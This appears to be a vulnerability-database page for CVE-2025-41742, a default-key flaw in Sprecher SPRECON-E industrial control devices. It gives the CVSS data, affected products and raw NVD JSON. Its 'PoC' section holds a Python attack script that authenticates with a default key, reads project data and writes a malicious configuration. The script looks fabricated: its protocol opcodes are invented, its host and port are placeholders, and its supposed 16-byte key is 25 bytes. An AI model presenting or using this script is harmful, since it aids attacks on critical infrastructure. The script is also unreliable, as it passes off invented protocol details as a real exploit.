Security Vulnerability Report
中文
CVE-2025-41742 CVSS 9.8 CRITICAL

CVE-2025-41742

Published: 2025-12-02 11:15:51
Last Modified: 2026-02-23 17:15:45
Source: [email protected]

Description

Sprecher Automations SPRECON-E-C,  SPRECON-E-P, SPRECON-E-T3 is vulnerable to attack by an unauthorized remote attacker via default cryptographic keys. The use of these keys allows the attacker to read, modify, and write projects and data, or to access any device via remote maintenance.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:sprecher-automation:sprecon-e-c_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sprecher-automation:sprecon-e-c:*:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sprecher-automation:sprecon-e-p_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sprecher-automation:sprecon-e-p:*:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sprecher-automation:sprecon-e-t3_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sprecher-automation:sprecon-e-t3:*:*:*:*:*:*:*:* - NOT VULNERABLE
SPRECON-E-C (所有版本)
SPRECON-E-P (所有版本)
SPRECON-E-T3 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-41742 PoC - Sprecher SPRECON-E Default Encryption Key Exploitation Note: This is for educational and authorized testing purposes only """ import socket import struct import hashlib from Crypto.Cipher import AES TARGET_HOST = "target_device_ip" TARGET_PORT = 12345 DEFAULT_KEY = b"SPRECON_E_DEFAULT_KEY_16B" # Example placeholder key def generate_session_key(default_key, nonce): """Generate session encryption key using default key and nonce""" return hashlib.sha256(default_key + nonce).digest()[:16] def exploit_default_key(): """Attempt to exploit default encryption key vulnerability""" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((TARGET_HOST, TARGET_PORT)) # Step 1: Send authentication request with default key nonce = b"\x00" * 16 # Server nonce session_key = generate_session_key(DEFAULT_KEY, nonce) auth_packet = struct.pack('>I', 0x01) + session_key + nonce sock.send(auth_packet) # Step 2: Receive authentication response response = sock.recv(1024) if response and response[0:4] == b"\x00\x00\x00\x01": print("[+] Authentication successful with default key") # Step 3: Read project data read_cmd = struct.pack('>I', 0x02) + b"\x01\x00\x00\x00" sock.send(read_cmd) project_data = sock.recv(4096) print(f"[+] Project data retrieved: {len(project_data)} bytes") # Step 4: Write malicious configuration malicious_config = b"MALICIOUS_CONFIG_DATA" write_cmd = struct.pack('>I', 0x03) + malicious_config sock.send(write_cmd) print("[+] Malicious configuration written successfully") return True else: print("[-] Authentication failed") return False except Exception as e: print(f"[-] Error: {e}") return False finally: sock.close() if __name__ == "__main__": print("CVE-2025-41742 PoC - SPRECON-E Default Key Exploitation") exploit_default_key()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-41742", "sourceIdentifier": "[email protected]", "published": "2025-12-02T11:15:51.153", "lastModified": "2026-02-23T17:15:44.987", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sprecher Automations SPRECON-E-C,  SPRECON-E-P, SPRECON-E-T3 is vulnerable to attack by an unauthorized remote attacker via default cryptographic keys. The use of these keys allows the attacker to read, modify, and write projects and data, or to access any device via remote maintenance."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1394"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sprecher-automation:sprecon-e-c_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "9DF00EFE-05D9-48D1-9D32-B0E4E40D14F3"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sprecher-automation:sprecon-e-c:*:*:*:*:*:*:*:*", "matchCriteriaId": "17CF3E5A-AAD9-4B96-945D-501E461661CC"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sprecher-automation:sprecon-e-p_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F27A10F8-544C-4B48-9FB9-198D79CCB885"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sprecher-automation:sprecon-e-p:*:*:*:*:*:*:*:*", "matchCriteriaId": "E0CC75D6-DD26-42A0-83F4-69423D8F5284"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sprecher-automation:sprecon-e-t3_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "B0BDEAF2-092F-413D-9D16-AAFA484D13AB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sprecher-automation:sprecon-e-t3:*:*:*:*:*:*:*:*", "matchCriteriaId": "6384D2B2-DCDA-445B-8336-E4EF0E2B3267"}]}]}], "references": [{"url": "https://www.sprecher-automation.com/fileadmin/itSecurity/PDF/SPR-2511042_de.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.